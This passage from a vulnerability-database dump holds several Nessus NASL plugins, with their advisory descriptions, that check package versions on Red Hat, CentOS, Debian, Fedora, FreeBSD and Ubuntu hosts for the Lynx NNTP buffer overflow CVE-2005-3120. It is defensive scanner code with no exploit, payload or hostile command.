audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2005:803\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"lynx-2.8.4-18.1.1\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"lynx-2.8.5-11.1\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"lynx-2.8.5-18.1\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lynx\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T06:40:50", "bulletinFamily": "scanner", "description": "An updated lynx package that corrects a security flaw is now\navailable.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nLynx is a text-based Web browser.\n\nUlf Harnhammar discovered a stack overflow bug in Lynx when handling\nconnections to NNTP (news) servers. An attacker could create a web\npage redirecting to a malicious news server which could execute\narbitrary code as the user running lynx. The Common Vulnerabilities\nand Exposures project assigned the name CVE-2005-3120 to this issue.\n\nUsers should update to this erratum package, which contains a\nbackported patch to correct this issue.", "modified": "2019-12-02T00:00:00", "id": "CENTOS_RHSA-2005-803.NASL", "href": "https://www.tenable.com/plugins/nessus/21863", "published": "2006-07-03T00:00:00", "title": "CentOS 3 / 4 : lynx (CESA-2005:803)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2005:803 and \n# CentOS Errata and Security Advisory 2005:803 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21863);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2019/10/25 13:36:03\");\n\n script_cve_id(\"CVE-2005-3120\");\n script_bugtraq_id(15117);\n script_xref(name:\"RHSA\", value:\"2005:803\");\n\n script_name(english:\"CentOS 3 / 4 : lynx (CESA-2005:803)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated lynx package that corrects a security flaw is now\navailable.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nLynx is a text-based Web browser.\n\nUlf Harnhammar discovered a stack overflow bug in Lynx when handling\nconnections to NNTP (news) servers. An attacker could create a web\npage redirecting to a malicious news server which could execute\narbitrary code as the user running lynx. The Common Vulnerabilities\nand Exposures project assigned the name CVE-2005-3120 to this issue.\n\nUsers should update to this erratum package, which contains a\nbackported patch to correct this issue.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-October/012288.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?32cf0cb0\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-October/012289.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?91ed8dc4\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-October/012292.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a4e05709\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-October/012293.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?11a72566\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-October/012320.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?26ff1972\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-October/012321.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?132e0a60\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected lynx package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:lynx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/10/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/07/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(3|4)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 3.x / 4.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-3\", reference:\"lynx-2.8.5-11.1\")) flag++;\n\nif (rpm_check(release:\"CentOS-4\", reference:\"lynx-2.8.5-18.1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lynx\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T07:01:19", "bulletinFamily": "scanner", "description": "Ulf Harnhammar discovered a buffer overflow in lynx, a text-mode\nbrowser for the WWW that can be remotely exploited. During the\nhandling of Asian characters when connecting to an NNTP server lynx\ncan be tricked to write past the boundary of a buffer which can lead\nto the execution of arbitrary code.", "modified": "2019-12-02T00:00:00", "id": "DEBIAN_DSA-874.NASL", "href": "https://www.tenable.com/plugins/nessus/22740", "published": "2006-10-14T00:00:00", "title": "Debian DSA-874-1 : lynx - buffer overflow", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-874. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22740);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/08/02 13:32:19\");\n\n script_cve_id(\"CVE-2005-3120\");\n script_xref(name:\"DSA\", value:\"874\");\n\n script_name(english:\"Debian DSA-874-1 : lynx - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ulf Harnhammar discovered a buffer overflow in lynx, a text-mode\nbrowser for the WWW that can be remotely exploited. During the\nhandling of Asian characters when connecting to an NNTP server lynx\ncan be tricked to write past the boundary of a buffer which can lead\nto the execution of arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2005/dsa-874\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the lynx package.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 2.8.4.1b-3.3.\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 2.8.5-2sarge1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lynx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/10/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"lynx\", reference:\"2.8.4.1b-3.3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"lynx\", reference:\"2.8.5-2sarge1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T07:02:58", "bulletinFamily": "scanner", "description": "This package fixes a security bug (CVE-2005-3120) when handling\nconnections to NNTP (news) servers.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-12-02T00:00:00", "id": "FEDORA_2005-994.NASL", "href": "https://www.tenable.com/plugins/nessus/20028", "published": "2005-10-19T00:00:00", "title": "Fedora Core 4 : lynx-2.8.5-23.1 (2005-994)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2005-994.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20028);\n script_version (\"1.14\");\n script_cvs_date(\"Date: 2019/08/02 13:32:24\");\n\n script_xref(name:\"FEDORA\", value:\"2005-994\");\n\n script_name(english:\"Fedora Core 4 : lynx-2.8.5-23.1 (2005-994)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This package fixes a security bug (CVE-2005-3120) when handling\nconnections to NNTP (news) servers.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2005-October/001494.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?65aae8ae\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected lynx and / or lynx-debuginfo packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:lynx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:lynx-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/10/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 4.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC4\", reference:\"lynx-2.8.5-23.1\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"lynx-debuginfo-2.8.5-23.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lynx / lynx-debuginfo\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T07:31:55", "bulletinFamily": "scanner", "description": "Ulf Harnhammar reports :\n\nWhen Lynx connects to an NNTP server to fetch information about the\navailable articles in a newsgroup, it will call a function called\nHTrjis() with the information from certain article headers. The\nfunction adds missing ESC characters to certain data, to support Asian\ncharacter sets. However, it does not check if it writes outside of the\nchar array buf, and that causes a remote stack-based buffer overflow.", "modified": "2019-12-02T00:00:00", "id": "FREEBSD_PKG_C01170BF499011DAA1B8000854D03344.NASL", "href": "https://www.tenable.com/plugins/nessus/21506", "published": "2006-05-13T00:00:00", "title": "FreeBSD : lynx -- remote buffer overflow (c01170bf-4990-11da-a1b8-000854d03344)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21506);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/08/02 13:32:37\");\n\n script_cve_id(\"CVE-2005-3120\");\n\n script_name(english:\"FreeBSD : lynx -- remote buffer overflow (c01170bf-4990-11da-a1b8-000854d03344)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ulf Harnhammar reports :\n\nWhen Lynx connects to an NNTP server to fetch information about the\navailable articles in a newsgroup, it will call a function called\nHTrjis() with the information from certain article headers. The\nfunction adds missing ESC characters to certain data, to support Asian\ncharacter sets. However, it does not check if it writes outside of the\nchar array buf, and that causes a remote stack-based buffer overflow.\"\n );\n # http://lists.grok.org.uk/pipermail/full-disclosure/2005-October/038019.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a40354e4\"\n );\n # https://vuxml.freebsd.org/freebsd/c01170bf-4990-11da-a1b8-000854d03344.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1447932b\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ja-lynx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:lynx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:lynx-ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/10/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/10/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/05/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"lynx<2.8.5_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"lynx>2.8.6*<2.8.6d14\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ja-lynx<2.8.5_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ja-lynx>2.8.6*<2.8.6d14\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"lynx-ssl<2.8.5_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T07:02:58", "bulletinFamily": "scanner", "description": "This package fixes a security bug (CVE-2005-3120) when handling\nconnections to NNTP (news) servers.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-12-02T00:00:00", "id": "FEDORA_2005-993.NASL", "href": "https://www.tenable.com/plugins/nessus/20027", "published": "2005-10-19T00:00:00", "title": "Fedora Core 3 : lynx-2.8.5-18.0.1 (2005-993)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2005-993.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20027);\n script_version (\"1.14\");\n script_cvs_date(\"Date: 2019/08/02 13:32:24\");\n\n script_xref(name:\"FEDORA\", value:\"2005-993\");\n\n script_name(english:\"Fedora Core 3 : lynx-2.8.5-18.0.1 (2005-993)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This package fixes a security bug (CVE-2005-3120) when handling\nconnections to NNTP (news) servers.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2005-October/001493.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?28145583\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected lynx and / or lynx-debuginfo packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:lynx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:lynx-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/10/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^3([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 3.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC3\", reference:\"lynx-2.8.5-18.0.1\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"lynx-debuginfo-2.8.5-18.0.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lynx / lynx-debuginfo\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T09:44:56", "bulletinFamily": "scanner", "description": "Ulf Harnhammar discovered a remote vulnerability in Lynx when\nconnecting to a news server (NNTP). The function that added missing\nescape chararacters to article headers did not check the size of the\ntarget buffer. Specially crafted news entries could trigger a buffer\noverflow, which could be exploited to execute arbitrary code with the\nprivileges of the user running lynx. In order to exploit this, the\nuser is not even required to actively visit a news site with Lynx\nsince a malicious HTML page could automatically redirect to an nntp://\nURL with malicious news items.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-12-02T00:00:00", "id": "UBUNTU_USN-206-1.NASL", "href": "https://www.tenable.com/plugins/nessus/20622", "published": "2006-01-15T00:00:00", "title": "Ubuntu 4.10 / 5.04 / 5.10 : lynx vulnerability (USN-206-1)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-206-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20622);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/08/02 13:33:00\");\n\n script_cve_id(\"CVE-2005-3120\");\n script_xref(name:\"USN\", value:\"206-1\");\n\n script_name(english:\"Ubuntu 4.10 / 5.04 / 5.10 : lynx vulnerability (USN-206-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ulf Harnhammar discovered a remote vulnerability in Lynx when\nconnecting to a news server (NNTP). The function that added missing\nescape chararacters to article headers did not check the size of the\ntarget buffer. Specially crafted news entries could trigger a buffer\noverflow, which could be exploited to execute arbitrary code with the\nprivileges of the user running lynx. In order to exploit this, the\nuser is not even required to actively visit a news site with Lynx\nsince a malicious HTML page could automatically redirect to an nntp://\nURL with malicious news items.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected lynx package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", 